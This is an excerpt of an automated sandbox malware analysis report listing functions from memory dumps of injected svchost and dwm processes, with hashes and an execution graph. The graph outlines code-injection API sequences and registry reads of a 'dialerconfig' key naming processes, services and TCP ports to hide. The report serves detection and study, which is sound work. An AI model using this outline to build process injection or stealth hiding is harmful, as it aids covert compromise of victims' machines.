                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                        • Instruction ID: 2d239d733d9f377039aa2bd8920474b359dab336e32e40763e3e9fde822d2307
                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                        • Instruction Fuzzy Hash: 4961C73A559E48C6E760CB15E85435AB7A0F3CC786F600116EA8E5BBA9DF7CC452CF40
                        Function 00000158709B3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: b22d272b1eca59d2f8be55dc33f3d675a4ea0f3ee1479b912bd1a7d695708eec
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: C411C47A610E01D1FA749568EC513E934806BDC37EF78C728BD6ABEED78EA4C8474900
                        Function 00000158709E4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: 45fce9a1b44715b5da1f110af4fbf2b5e72d243b065df00d6a6cb7d411a89504
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: F011B23BA18F40E1FE645578DC553E531416BFC3A6E380624A5766E6F6CEA8CCA34901
                        Function 00000158709AF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: _invalid_parameter_noinfo
                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                        • API String ID: 3215553584-4202648911
                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction ID: bfa070ed68fe50ba7f1f2c297ac04698a413684fc1faf6f2fb695e8f31954a37
                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction Fuzzy Hash: 2A6192BE60CE00C2FA658BA4DC603EA7A90E7CD792F714516CA153F795EE34C847EA00
                        Function 00000158709DAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CallEncodePointerTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3544855599-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: 7893eb5ab0e642a1a0fa3d649198329584f3167fee0553330bce6cb7a40f68a6
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: 06614C3A605A48CAEB109F65D8403DD77A1F388B99F244216DE492BB95DF38D556CB00
                        Function 00000158709AA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: ad2e3dc20faeaab019d23fdd26e7ac47928873f210296601eed610e87e364d0a
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: C051D1BA108A80CBEF648B15984439877A0F3DCB96F284116DA596BBC5CF39D462EF40
                        Function 00000158709DAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: c55e6b89f1deeede7607d44a4678232a21c5566193418bc64356b270fa1dde39
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: 8A51B57A148B88CAEB748F25D9443D977A0F3D8B96F244115DA496BBD6CF34C462CF00
                        Function 00000158709A8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction ID: 522bc94808ccd0891ba8f4ee668879e4334006ea7c9bfdc7b7a578e3ad5792e1
                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction Fuzzy Hash: 4F51E7BAB15A00CAD754CF15D808B9AB395F3C8B99F609064EE066B748EF34CC42DF04
                        Function 00000158709A83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction ID: 425ae51dfe7bd6ea10f93c1d87e22065c9b592431508976835fcf9b4f7ab9431
                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction Fuzzy Hash: 1131D1B9615B40DAE710DF11EC4879AB7A4F3C8B9AF258014EE4A6B794DF38C942DB04
                        Function 00000158709E2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: FileWrite$ConsoleErrorLastOutput
                        • String ID:
                        • API String ID: 2718003287-0
                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction ID: 30429b6e85d52d015e3732def11cd14d4559421b5eb639c62a2224f3fa9bfba5
                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction Fuzzy Hash: 66D1CF77714A80C9E711CF65D8403DC3BA1F398799F24421ADE59ABBA9EE34C927CB40
                        Function 00000158709D14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Heap$Process$Free
                        • String ID:
                        • API String ID: 3168794593-0
                        • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction ID: 6c2322820e03c340fe85ce000d17cb2736a86ce4299153c466e268a4634f297b
                        • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction Fuzzy Hash: CF014C3B608E94D6D705DF66ED0428A77A1F78CFC2F144429EA4967729DE38C462CB40
                        Function 00000158709E2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: ConsoleErrorLastMode
                        • String ID:
                        • API String ID: 953036326-0
                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction ID: 9698fe35d1373322723ac282d06d8dd41e13e0f968837ab8ea655e484caeaefb
                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction Fuzzy Hash: 45918E7B610A54C5F7609F65DC403ED3BA0B789B8AF38411DDE4A7B6A5DE34C8A38B00
                        Function 00000158709D7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                        • String ID:
                        • API String ID: 2933794660-0
                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction ID: d83516dcc5bf840c11a0c3c522cc2f90a05092959f30cd3160fc22130dc72981
                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction Fuzzy Hash: A9115A3A714F00CAEB00CF60EC543A833A4F79D769F540E21EA6D5A7A4DF78D5A98780
                        Function 00000158709D253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction ID: f47752b0ae6f6901657473cb0ccd733c6e7a9ca02a6f2b5df069b7bf189e1af2
                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction Fuzzy Hash: C571C23A248F89C6E7349E25DC443EA7794F3DDB86F640026DD496BB8ADE35C646CB00
                        Function 00000158709A9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: CallTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3163161869-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: 489574c67d8b5b6cc54a2877ae297f4e8f41fd0bb560a578f5265c3132118aee
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: 3761497A608B44CAEB20DF65D8403DD77A0F388B89F244215EF492BB99DF38D556DB40
                        Function 00000158709D2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction ID: babde32fb5154fc8530fc586cff3b7450ac821e147294971176bd01e01761f2d
                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction Fuzzy Hash: B051E63A24CB89C1E6359B29E8583EA7751F3ED782F640125DD492BB6BCE39C5068F40
                        Function 00000158709E26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID: U
                        • API String ID: 442123175-4171548499
                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction ID: 21ff62e2b89e22826b140db66bb7822c727ad4cd8fe966186e5f0310e84707f2
                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction Fuzzy Hash: 8841A037219A80C2DB208F25E8443EAB7A0F79C795F644025EE4D9B798EF3CC952CB40
                        Function 00000158709D94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: ExceptionFileHeaderRaise
                        • String ID: csm
                        • API String ID: 2573137834-1018135373
                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction ID: 20f4be22c22dfa457ef3525fbc3f7e3b2bed3974d008a9829f0cdff42773ce01
                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction Fuzzy Hash: 8D112B36218F84C2EB619B15F94039977E5F788B95F684224EE8D1BB69DF3CC952CB00
                        Function 00000158709A7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: ierarchy Descriptor'$riptor at (
                        • API String ID: 592178966-758928094
                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction ID: 3b3cf7cab3b32b493eb2ba88bbe49323af7bffc66ca1579de9ffd3a8dc560e24
                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction Fuzzy Hash: 13E086B1640F44D0DF018F61EC403D873A0DB9CB68BA89122D95C5A311FE38D5FAC700
                        Function 00000158709A73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: Locator'$riptor at (
                        • API String ID: 592178966-4215709766
                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction ID: 8b563b15b0da3dea3b2a42213421ba672c2fb53560027d55dbb8324bba71f4a8
                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction Fuzzy Hash: EDE08671600F44D0DF028F61D8403D87360E79CB68B989122C94C5A311EE38D5E6C700
                        Function 00000158709D1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID:
                        • API String ID: 756756679-0
                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction ID: 29c7f6ae37fee443e275d0900ba1dffe24d5f51a1d6125abf64e6308baa90841
                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction Fuzzy Hash: B2118E3A615F48C1EA048B66A8043A977A0E7CDFC2F2840289E8D6B766DE38C852C700
                        Function 00000158709D1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess
                        • String ID:
                        • API String ID: 1617791916-0
                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction ID: 0df0b71972fc614dcc7a18976dac37df89d2385fd46c5fb6c76c0ed9fa5f8c47
                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction Fuzzy Hash: 24E0653A601A04C6E7058F52DC0838E3AE1FBCDF56F14C014C9090B361DF7D88A6CB50

                        Execution Graph

                        Execution Coverage:1.6%
                        Dynamic/Decrypted Code Coverage:95.2%
                        Signature Coverage:0%
                        Total number of Nodes:124
                        Total number of Limit Nodes:16
                        execution_graph 15053 26db1675cf0 15054 26db1675cfd 15053->15054 15055 26db1675e1a 15054->15055 15056 26db1675d09 15054->15056 15060 26db1675e41 VirtualProtect FlushInstructionCache 15055->15060 15061 26db1675efe 15055->15061 15057 26db1675d8d 15056->15057 15058 26db1675d3e 15056->15058 15059 26db1675d66 SetThreadContext 15058->15059 15059->15057 15060->15055 15062 26db1675f1e 15061->15062 15073 26db16743e0 15061->15073 15069 26db1674df0 GetCurrentProcess 15062->15069 15065 26db1675f23 15066 26db1675f37 ResumeThread 15065->15066 15068 26db1675f77 _log10_special 15065->15068 15067 26db1675f6b 15066->15067 15067->15065 15070 26db1674e0c 15069->15070 15071 26db1674e53 15070->15071 15072 26db1674e22 VirtualProtect FlushInstructionCache 15070->15072 15071->15065 15072->15070 15075 26db16743fc 15073->15075 15074 26db167445f 15074->15062 15075->15074 15076 26db1674412 VirtualFree 15075->15076 15076->15075 15077 26db15b273c 15079 26db15b276a 15077->15079 15078 26db15b28d4 15079->15078 15080 26db15b27c5 VirtualAlloc 15079->15080 15080->15078 15081 26db15b27ec 15080->15081 15081->15078 15082 26db15b2858 LoadLibraryA 15081->15082 15082->15081 15083 26db167554d 15085 26db1675554 15083->15085 15084 26db16755bb 15085->15084 15086 26db1675637 VirtualProtect 15085->15086 15087 26db1675663 GetLastError 15086->15087 15088 26db1675671 15086->15088 15087->15088 15089 26db1671abc 15095 26db1671628 GetProcessHeap 15089->15095 15091 26db1671ad2 Sleep SleepEx 15093 26db1671acb 15091->15093 15093->15091 15094 26db1671598 StrCmpIW StrCmpW 15093->15094 15140 26db16718b4 15093->15140 15094->15093 15096 26db1671648 __std_exception_copy 15095->15096 15157 26db1671268 GetProcessHeap 15096->15157 15098 26db1671650 15099 26db1671268 2 API calls 15098->15099 15100 26db1671661 15099->15100 15101 26db1671268 2 API calls 15100->15101 15102 26db167166a 15101->15102 15103 26db1671268 2 API calls 15102->15103 15104 26db1671673 15103->15104 15105 26db167168e RegOpenKeyExW 15104->15105 15106 26db16716c0 RegOpenKeyExW 15105->15106 15107 26db16718a6 15105->15107 15108 26db16716ff RegOpenKeyExW 15106->15108 15109 26db16716e9 15106->15109 15107->15093 15111 26db1671723 15108->15111 15112 26db167173a RegOpenKeyExW 15108->15112 15168 26db16712bc RegQueryInfoKeyW 15109->15168 15161 26db167104c RegQueryInfoKeyW 15111->15161 15115 26db167175e 15112->15115 15116 26db1671775 RegOpenKeyExW 15112->15116 15113 26db16716f5 RegCloseKey 15113->15108 15117 26db16712bc 11 API calls 15115->15117 15118 26db16717b0 RegOpenKeyExW 15116->15118 15119 26db1671799 15116->15119 15121 26db167176b RegCloseKey 15117->15121 15123 26db16717d4 15118->15123 15124 26db16717eb RegOpenKeyExW 15118->15124 15122 26db16712bc 11 API calls 15119->15122 15121->15116 15125 26db16717a6 RegCloseKey 15122->15125 15126 26db16712bc 11 API calls 15123->15126 15127 26db167180f 15124->15127 15128 26db1671826 RegOpenKeyExW 15124->15128 15125->15118 15129 26db16717e1 RegCloseKey 15126->15129 15130 26db167104c 4 API calls 15127->15130 15131 26db1671861 RegOpenKeyExW 15128->15131 15132 26db167184a 15128->15132 15129->15124 15136 26db167181c RegCloseKey 15130->15136 15134 26db167189c RegCloseKey 15131->15134 15135 26db1671885 15131->15135 15133 26db167104c 4 API calls 15132->15133 15137 26db1671857 RegCloseKey 15133->15137 15134->15107 15138 26db167104c 4 API calls 15135->15138 15136->15128 15137->15131 15139 26db1671892 RegCloseKey 15138->15139 15139->15134 15186 26db16714a4 15140->15186 15179 26db1686168 15157->15179 15160 26db16712ae __std_exception_copy 15160->15098 15162 26db16710bf 15161->15162 15163 26db16711b5 RegCloseKey 15161->15163 15162->15163 15164 26db16710cf RegEnumValueW 15162->15164 15163->15112 15166 26db1671125 __std_exception_copy __free_lconv_num 15164->15166 15165 26db167114e GetProcessHeap 15165->15166 15166->15163 15166->15164 15166->15165 15167 26db167116e GetProcessHeap 15166->15167 15167->15166 15169 26db167148a __free_lconv_num 15168->15169 15170 26db1671327 GetProcessHeap 15168->15170 15169->15113 15176 26db167133e __std_exception_copy __free_lconv_num 15170->15176 15171 26db1671352 RegEnumValueW 15171->15176 15172 26db1671476 GetProcessHeap 15172->15169 15174 26db16713d3 GetProcessHeap 15174->15176 15175 26db167141e lstrlenW GetProcessHeap 15175->15176 15176->15171 15176->15172 15176->15174 15176->15175 15177 26db16713f3 GetProcessHeap 15176->15177 15178 26db1671443 StrCpyW 15176->15178 15181 26db167152c 15176->15181 15177->15176 15178->15176 15180 26db1671283 GetProcessHeap 15179->15180 15180->15160 15182 26db1671546 15181->15182 15185 26db167157c 15181->15185 15183 26db167155d StrCmpIW 15182->15183 15184 26db1671565 StrCmpW 15182->15184 15182->15185 15183->15182 15184->15182 15185->15176 15187 26db16714e1 GetProcessHeap 15186->15187 15188 26db16714c1 GetProcessHeap 15186->15188 15192 26db1686180 15187->15192 15189 26db16714da __free_lconv_num 15188->15189 15189->15187 15189->15188 15193 26db16714f6 GetProcessHeap HeapFree 15192->15193 15194 26db1673ab9 15197 26db1673a06 15194->15197 15195 26db1673a70 15196 26db1673a56 VirtualQuery 15196->15195 15196->15197 15197->15195 15197->15196 15198 26db1673a8a VirtualAlloc 15197->15198 15198->15195 15199 26db1673abb GetLastError 15198->15199 15199->15195 15199->15197 15200 26db16728c8 15202 26db167290e 15200->15202 15201 26db1672970 15202->15201 15204 26db1673844 15202->15204 15205 26db1673851 StrCmpNIW 15204->15205 15206 26db1673866 15204->15206 15205->15206 15206->15202

                        Executed Functions

                        Function 0000026DB1671628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                        • API String ID: 106492572-2879589442
                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction ID: fa86b2a9f44b472905bfb38af4152c87717321f78ab600eecce9153a85f1924f
                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction Fuzzy Hash: 9D711D36B10A18C6EB109F65EC9869973B4F794B8CF025212DE4E87B6DEF3AC445C784
                        Function 0000026DB1673790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModule
                        • String ID: wr
                        • API String ID: 1092925422-2678910430
                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction ID: 70c650b70df424567e79b71cf095d565d0b1e69e1e0bdd4a48dd4f5053c07e14
                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction Fuzzy Hash: 03116136B0474582FF149B25F90876976B4F748B89F460229DE8907759EF3EC605C744
                        Function 0000026DB1675B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
